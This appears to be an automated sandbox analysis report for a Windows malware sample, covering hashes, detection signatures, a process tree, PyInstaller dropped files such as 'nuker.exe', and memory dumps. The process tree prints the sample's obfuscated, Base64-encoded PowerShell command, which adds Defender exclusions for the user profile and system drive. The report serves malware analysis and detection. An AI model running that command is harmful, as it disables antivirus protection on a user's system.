Analysis

  • max time kernel
    115s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/03/2025, 06:11

General

  • Target

    563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe

  • Size

    12.4MB

  • MD5

    597dbb425d3fdbfcd96cfb7f0f447eda

  • SHA1

    34f05cd0cdaca3015e2f6e3fd24ef460f1c0c037

  • SHA256

    563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469

  • SHA512

    75994ed55a09539f556f31442dd7ad838a1484466e2ab396b36d017f8fbc28bd0c052c17c0d74376d4e92837d1a4e6d97ec8190ad6ee0a1f8d5a8d6e6acc63bd

  • SSDEEP

    393216:uTmEkeTbTQC4x2FVSRsWBWlBOBum5xo+s:GjTnxVRIFDzoD

Malware Config

Signatures

  • .NET Reactor proctector 4 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 31 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe
    "C:\Users\Admin\AppData\Local\Temp\563d48f59066cea184f9ca9c8e116af85f627335f9e38749e10b9f5a8224e469.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:6088
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAeQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAbgBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAYgBrACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5496
    • C:\Users\Admin\AppData\Local\nuker.exe
      "C:\Users\Admin\AppData\Local\nuker.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4472
      • C:\Users\Admin\AppData\Local\nuker.exe
        "C:\Users\Admin\AppData\Local\nuker.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2052
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c cls & mode 85,20 & title [Bot Nuker] - Configuration
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2812
          • C:\Windows\system32\mode.com
            mode 85,20
            5⤵
              PID:3704
      • C:\Users\Admin\AppData\Local\DSAServiceUpdater.exe
        "C:\Users\Admin\AppData\Local\DSAServiceUpdater.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2176
      • C:\Users\Admin\AppData\Local\Node.exe
        "C:\Users\Admin\AppData\Local\Node.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4756

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\DSAServiceUpdater.exe

      Filesize

      222KB

      MD5

      70fa96bb8c3fe5a7627319edae1f1ef5

      SHA1

      1dec9e8abddbfdb636b6f648fa13331a959aca0a

      SHA256

      bac55448c69532136a59db47212bb9cec775276f5d673afa1df865f11f77df5f

      SHA512

      b606e7aa69280d688f979cd4409be235228de2ca9cd0df3796aef6caaa5c727645757ec4dbeee9ed72929f698490bfc75e66becf16cb71d8aea4efb403509ea8

    • C:\Users\Admin\AppData\Local\Node.exe

      Filesize

      225KB

      MD5

      181994193a41a2237c9f03bd05fa05e8

      SHA1

      0580f732a6cec33037d7f9ab94af781c8cc1374d

      SHA256

      31e059406bdd39e02d4b160eacdc23e850630763558f0c74b3f0a29f90fb602f

      SHA512

      45fa74b23c18c6c0605374780d761e442fb23b314e971f728ec15d411bcabd4d7947b8be6d5141c206b12535a484c33b4c81d2154f8d3c48329cc4aed91480de

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\VCRUNTIME140.dll

      Filesize

      93KB

      MD5

      ade7aac069131f54e4294f722c17a412

      SHA1

      fede04724bdd280dae2c3ce04db0fe5f6e54988d

      SHA256

      92d50f7c4055718812cd3d823aa2821d6718eb55d2ab2bac55c2e47260c25a76

      SHA512

      76a810a41eb739fba2b4c437ed72eda400e71e3089f24c79bdabcb8aab0148d80bd6823849e5392140f423addb7613f0fc83895b9c01e85888d774e0596fc048

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_asyncio.pyd

      Filesize

      63KB

      MD5

      ed7fcb660eda9b654ab2da036e57a0f2

      SHA1

      d77d10fa8fd39a531d6a2a16e8ec388ddc324f3e

      SHA256

      adad425029770cc17bfca1515c1ec69f5cfe93057cab6641f642596d599ce446

      SHA512

      565f0bcefdb366b4f970f8a66af3773b94cec32323f37621d07f8ca4e56a0d3fee64cc6ee3dccb118a02100fd4e9ea5c72962aaeef16e73ad3c531274b1145a6

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_bz2.pyd

      Filesize

      84KB

      MD5

      fb4cc31572e87bd27235e79cbe809066

      SHA1

      4264836c0e096bd68c110a27743c7425c49c7627

      SHA256

      fd230c44ced7358a549dfeabd5b7acd0cab94c66cd9b55778c94e3f6ed540854

      SHA512

      64c5a61da120ec12cde621e9e0a5c7c2d4e9631cc5826e6f9ca083d7782c74a8a606e0572d7f268fb99d5c8c30b60a9cf4e9b9a222c4ad1876bdda40bf36d992

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_ctypes.pyd

      Filesize

      124KB

      MD5

      3acd4d8d1ea5deaac665f8be294b827f

      SHA1

      0b185ca6badb44148db3eaa03daeddfa472d8b31

      SHA256

      64725476a8f97309215b04d38071941bf8ceaf0534fcca081cbf8e1da31f3b53

      SHA512

      2535363b6c1035fb9f8a7da9b4e82a769540933a3e0a0ab20f1ead389f679c76901c887567a413926fd728f37f4d3710ecae634adb4649477e05f413efa2a549

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_hashlib.pyd

      Filesize

      64KB

      MD5

      b8c0bd956fdcd86a3fd717a2c1442812

      SHA1

      15126e64b4530c0d6533b0b58e38901d571599f1

      SHA256

      9d79786650e7a7eaf028d2b79481fc5675afa6309eee4f7857553818e35dd54b

      SHA512

      010bcb89bb4387122651f6aa25a54e3e06d233318aed3fbd0e071efe265386dbd1260081983fc6f9a91107b84765ed08e7795af73f2acfc2fd6029c2048c3d59

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_lzma.pyd

      Filesize

      159KB

      MD5

      6ee5579d3fe9a03d3fe486ee66f1ced5

      SHA1

      7649fe4d67977c2b18439dfc420c1deafbb0d412

      SHA256

      f7ce997cf23a8e6e79f342aec5c9c7a8f45d9280941bf2986723bc220ed3e094

      SHA512

      6cd6e9077e73ff8ff83b6928758fa08dbb4aefd73a29f7bde9cfcad3535311dfdefbc082f1311bf6bc526ce57ccd6d9ebdedd11ffae18c1697aa8ea24005a092

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_overlapped.pyd

      Filesize

      45KB

      MD5

      43fd4b69785c93f81d5900e3ed4dede0

      SHA1

      59c6c83a15c47b6038236f9c936acb685f312e8e

      SHA256

      9ae530570f7c4c0cb5f6ef600b2d82e345a221bc62ee6bfebc271d6b80d32e39

      SHA512

      18a111f006919ba6b69edce27a661fb61c968221a71ca038b0b9ed0608f09fa290a7e4e99aba9ee5230067794e1fadb86a346fa581e21baa2822f19462b9fad1

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_queue.pyd

      Filesize

      28KB

      MD5

      08adb231f61035263e16061a0d6664f6

      SHA1

      908d7b62dc190ec055d705271b663875971bb85a

      SHA256

      a4322f5223dc220adfc9191306512a8303776329a1aab65f9930a90f9b524824

      SHA512

      49fe85f5aba99eb996c60227c1cb81be7f0a835e3a88fca1ef642459030267adb16660012f8fd2a11cfc79f22577d94bb747e7a146b636b5855f0f66f66f4dca

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_socket.pyd

      Filesize

      78KB

      MD5

      7f3066232da4d43420d8a3f6a3024b75

      SHA1

      7feb1633a185f5a814b4c61553531ce9ad08e1b7

      SHA256

      2561a4f41702d23045c19827925c59d42acc2e167bc9ae53f0eac3ed2d18e4e5

      SHA512

      cecfaa538af8337d6ba34fc0d11c293b7851c4cbc83a8fe47937093154833be1ef322bc9b574baf0f41a47a1dc6fc0d465275ee8cd90fb36337bd9ad22663512

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_ssl.pyd

      Filesize

      150KB

      MD5

      c3b612d5d1627e3a5d2617021e40ee4c

      SHA1

      738177b18736fb83430508832c2d7ab50e2732a4

      SHA256

      a9784768c1f41a8941ed30afeeeb42433154f91bd6e4c425bf8bb78d8cc70c61

      SHA512

      515d5a1ae422ad4eaae28144eea45c1d6d1faba3838a21579256ea781e1cdfeb954e33192fa1139f8873d11d05486760608571ebf9c0b16344b6eb0e21a89aca

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\_uuid.pyd

      Filesize

      22KB

      MD5

      fc4244bddf5afbd548225a8f93780ca7

      SHA1

      344f0098563e956b6490aaab74f8681c0fa420ab

      SHA256

      9436f8da6a885e55fb2708ff26e3c9b57735ecb9194b64b8998cde172648cb38

      SHA512

      84b35f732abc488cf0ed004f2b1161ad4de115780fb52f15eca4babe8b4eb67f73efac732e18b1e733ff2dcb9e28f9c038233aad5735365113d5b339ecec1793

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\aiohttp\_helpers.cp39-win_amd64.pyd

      Filesize

      47KB

      MD5

      6815a1c38a30d6ae70027184c09adccf

      SHA1

      ce5afe856c4445d173c0d524f139d1aed3cc4e65

      SHA256

      399dfeee9a2f8c6a132c2d4d28931f4c6c0f1d1394de54b182a6457d9143a418

      SHA512

      efd4fa17a9611ca4337cc667b164e83745bbc4043c226e684957146c9bc2ba37c892940845ec2ff0142d3fe604654a12bf05022782d0c0c3194e4d109b5ebf4f

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\aiohttp\_http_parser.cp39-win_amd64.pyd

      Filesize

      230KB

      MD5

      67946fe0102b3555988a8edd321946c0

      SHA1

      a93b16df8e9ccbfe2892e4676f58a695cde9604a

      SHA256

      636a925eb31c3a7de39cb9495613b13570606a0672d3e699cb6983287e0c01e3

      SHA512

      786a4e6c49f77bf6cffce5c98cbc66d518075309dacc4c3df286d3c3bc21f7c0cf7986bf85e374827ec7951c13acdd031e76c336bd1fb4fd265aa03a8a28dfd1

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\aiohttp\_http_writer.cp39-win_amd64.pyd

      Filesize

      41KB

      MD5

      1a518361de37d98224ff98bf47618ecf

      SHA1

      f81def8f71d203aaf68774f6e1158ccceb5806bc

      SHA256

      84e8b37d6fd0162610deb3c1d4887f70e6447850321eea846f860efc2862704b

      SHA512

      7ffef935ba56e2bbad0c569e63f5d33d83dfc72e10252ee259c6fff9859c4e302405a8c017012a9efa6da40ecc1de1ad3248a89404d8532b78b177a6d2ce305f

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\aiohttp\_websocket.cp39-win_amd64.pyd

      Filesize

      27KB

      MD5

      5fdb53cff23dc82384c70db00ada94c0

      SHA1

      c52391eadeafe9933682c7dbee182200b0640688

      SHA256

      d1c463b5c7a878ef5358a63bb0ea9e87311fe1f416f762bd18b4888c170c647f

      SHA512

      2d81e2eed6b4f37c4178141a24cf4475d27378a5bad3b6f8af022b185050ee9832de5db31271e5ca6e5e397f2e8a2a36edf9ca7eb6e0a9b918e3e8618c22e60b

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\base_library.zip

      Filesize

      763KB

      MD5

      a1133d8a4365d9ab74140559ae5bd788

      SHA1

      81af7f7de134c290566985ff75b6874c9c209d7d

      SHA256

      52dc5a09026d4f3171a001bb92f858860969930554f1165d114b1aaf6e550e3c

      SHA512

      3ba8b1905bcfea864ea38095a405c3b49815cb1ae745bcfbdc850220d815958ce8370a585cebe615f01f6944374c9f8f2c260f71ba1b8d74eb765039a0df132f

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\libcrypto-1_1.dll

      Filesize

      3.2MB

      MD5

      89511df61678befa2f62f5025c8c8448

      SHA1

      df3961f833b4964f70fcf1c002d9fd7309f53ef8

      SHA256

      296426e7ce11bc3d1cfa9f2aeb42f60c974da4af3b3efbeb0ba40e92e5299fdf

      SHA512

      9af069ea13551a4672fdd4635d3242e017837b76ab2815788148dd4c44b4cf3a650d43ac79cd2122e1e51e01fb5164e71ff81a829395bdb8e50bb50a33f0a668

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\libffi-7.dll

      Filesize

      32KB

      MD5

      eef7981412be8ea459064d3090f4b3aa

      SHA1

      c60da4830ce27afc234b3c3014c583f7f0a5a925

      SHA256

      f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081

      SHA512

      dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\libssl-1_1.dll

      Filesize

      674KB

      MD5

      50bcfb04328fec1a22c31c0e39286470

      SHA1

      3a1b78faf34125c7b8d684419fa715c367db3daa

      SHA256

      fddd0da02dcd41786e9aa04ba17ba391ce39dae6b1f54cfa1e2bb55bc753fce9

      SHA512

      370e6dfd318d905b79baf1808efbf6da58590f00006513bdaaed0c313f6fa6c36f634ea3b05f916cee59f4db25a23dd9e6f64caf3c04a200e78c193027f57685

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\multidict\_multidict.cp39-win_amd64.pyd

      Filesize

      43KB

      MD5

      d70507ffb5d2f6d527e32546fd138d0e

      SHA1

      3c43e86ac5afa6c4064b17fcaff45be5a2bbb9d3

      SHA256

      9fb82e21ee4f4d37d019b7053e6be4d9eed8c92cd12a3f7211125032c6e8cb22

      SHA512

      15933d164c1df23bfe8960a465b6ceedb34b765861ce8cc53bb87fe37745c59f8ee132891b5dc408278b8ad78d7c098f450291350c2e577436ebf2d49ac53faf

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\psutil\_psutil_windows.cp39-win_amd64.pyd

      Filesize

      74KB

      MD5

      789827bcbae298d8d3223f33228b26af

      SHA1

      29de4ad19963292504414196dd3e353084a0e864

      SHA256

      f79f6732ea5a3675312ef4b9506bed8e15aa2d9c722d30d0c96274675aa9dc68

      SHA512

      e4d53c2a31b046862accc33ca1fb3327df10fa92e79556d16ca5dccc132bb0812df9454196554c848644c312c58faa07558382a58b53cf8889e61684cfe14885

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\python3.DLL

      Filesize

      58KB

      MD5

      fbc5bf4b7d8bf735b04f283b8f6d64f8

      SHA1

      f23d13abcdf86b98ca7deb01c28ed373babd3d93

      SHA256

      c07923ce1382508d8eb6269ef955ce038613eb7f7b559044036ca78af7d1cb2c

      SHA512

      6449667d206d2bdea9852b7528ffa5d7e34be73558d136f45e3df0af2a7c8be27ebec91b22a8e691cc02b158105a65019098e038e7c1478ad0457b9209fcdc94

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\python39.dll

      Filesize

      4.3MB

      MD5

      64fde73c54618af1854a51db302192fe

      SHA1

      c5580dcea411bfed2d969551e8089aab8285a1d8

      SHA256

      d44753fe884b228da36acb17c879b500aeb0225a38fb7ca142fb046c60b22204

      SHA512

      a7d368301a27ee07a542e45e9ad27683707979fb198b887b66b523609f69e3327d4b77b7edc988c73a4fe26c44bff3abfcd032a991cd730fd8e0de2dad2e3a06

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\pythoncom39.dll

      Filesize

      543KB

      MD5

      778867d6c0fff726a86dc079e08c4449

      SHA1

      45f9b20f4bf27fc3df9fa0d891ca6d37da4add84

      SHA256

      5dfd4ad6ed4cee8f9eda2e39fe4da2843630089549c47c7adda8a3c74662698a

      SHA512

      5865cb730aa90c9ac95702396e5c9f32a80ff3a7720e16d64010583387b6dbd76d30426f77ab96ecb0e79d62262e211a4d08eae28109cd21846d51ed4256b8ea

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\pywintypes39.dll

      Filesize

      137KB

      MD5

      72511a9c3a320bcdbeff9bedcf21450f

      SHA1

      7a7af481fecbaf144ae67127e334b88f1a2c1562

      SHA256

      c06a570b160d5fd8030b8c7ccba64ce8a18413cb4f11be11982756aa4a2b6a80

      SHA512

      0d1682bb2637834bd8cf1909ca8dbeff0ea0da39687a97b5ef3d699210dc536d5a49a4f5ff9097cabd8eb65d8694e02572ff0fdabd8b186a3c45cd66f23df868

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\select.pyd

      Filesize

      28KB

      MD5

      f0a0ccc0013628ca15ee36d01d568410

      SHA1

      fac5a6061487c884b8987aa4ca2e098193b5388d

      SHA256

      e357e363a0b381183bf298aadf8708eaaf4e15b8ce538e5dd35d243951e07a87

      SHA512

      f01b75debbd62a7c79464aaec7dee4d4b4087cdc6fb2da4ed1ca3f32fbd4c1798a58fb1e3a0910e611c2513529a0b1bdeecb4a571432ca647a6fc592ee731825

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\unicodedata.pyd

      Filesize

      1.1MB

      MD5

      9a0230f1308e5fa5bc116e1007cbb87f

      SHA1

      f934a73dc8c0b2b575dee45b87ea9dcced6d1218

      SHA256

      16cd3b343d9ae9364aa6174f3b77199dd54d60f87a1cb4d99cd0ddbbdb3cfb38

      SHA512

      01d4c161c2869594cf65a105f4586f735b934a485b021439c13088c553faaf766d3d3003bf194c7e4170bb48077b3464b40e5496483c11208cdbf485ff2482c8

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\win32api.pyd

      Filesize

      131KB

      MD5

      99a3fc100cd43ad8d4bf9a2975a2192f

      SHA1

      cf37b7e17e51e7823b82b77c88145312df5b78cc

      SHA256

      1665ad12ad7cbf44ae63a622e8b97b5fd2ed0a092dfc5db8f09a9b6fdc2d57e7

      SHA512

      c0a60d5333925ce306ceb2eb38e13c6bae60d2663d70c37ecfc81b7346d12d9346550cb229d7c4f58d04dd182536d799e6eff77996d712fc177b1f5af7f4a4f2

    • C:\Users\Admin\AppData\Local\Temp\_MEI44722\yarl\_quoting_c.cp39-win_amd64.pyd

      Filesize

      78KB

      MD5

      b9dbd65dd477f78e292494852ed9cfb8

      SHA1

      d0c78884460fc4fd9810a00c9cd728629db40da4

      SHA256

      e7af21ec47fa1aea28ecc7516b389102514e9e5720b4af89e7aa48b489d4a500

      SHA512

      ef139107342dbb251079a800f275dce170891b5ea829395b256adebee60cae4e14fc852a58b0f476b4b7d3d87cc180046e691a855e4edc62c1baace6b53ab96b

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_btoebp1k.24c.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\nuker.exe

      Filesize

      11.9MB

      MD5

      4e92ec59842a81a9928f3518b0bcd1ca

      SHA1

      516fc5b9f5cd1821f2897c2abd9850fcf6fe278d

      SHA256

      e8838599e4c50e8e213e87dea7ea65b841df51ca2f50053b7a6800f4449bd5fa

      SHA512

      d66635486e571fb8a44f685766ce515a605ded953a5769da850d17e45f86874d242b7e5009ac527fc69ccfb9b0d773184165689615c097a847ed99f618d0e738

    • memory/2176-157-0x000002332CD80000-0x000002332D2A8000-memory.dmp

      Filesize

      5.2MB

    • memory/2176-35-0x0000023311E10000-0x0000023311E4C000-memory.dmp

      Filesize

      240KB

    • memory/2176-70-0x000002332C680000-0x000002332C842000-memory.dmp

      Filesize

      1.8MB

    • memory/4756-46-0x000002A102B40000-0x000002A102B7C000-memory.dmp

      Filesize

      240KB

    • memory/5496-10-0x00007FFE31F80000-0x00007FFE32A41000-memory.dmp

      Filesize

      10.8MB

    • memory/5496-30-0x00007FFE31F80000-0x00007FFE32A41000-memory.dmp

      Filesize

      10.8MB

    • memory/5496-6-0x00007FFE31F80000-0x00007FFE32A41000-memory.dmp

      Filesize

      10.8MB

    • memory/5496-156-0x00007FFE31F80000-0x00007FFE32A41000-memory.dmp

      Filesize

      10.8MB

    • memory/5496-17-0x00000175F0660000-0x00000175F0682000-memory.dmp

      Filesize

      136KB

    • memory/6088-2-0x00007FFE31F80000-0x00007FFE32A41000-memory.dmp

      Filesize

      10.8MB

    • memory/6088-0-0x00007FFE31F83000-0x00007FFE31F85000-memory.dmp

      Filesize

      8KB

    • memory/6088-53-0x00007FFE31F80000-0x00007FFE32A41000-memory.dmp

      Filesize

      10.8MB

    • memory/6088-1-0x0000000000110000-0x0000000000D7A000-memory.dmp

      Filesize

      12.4MB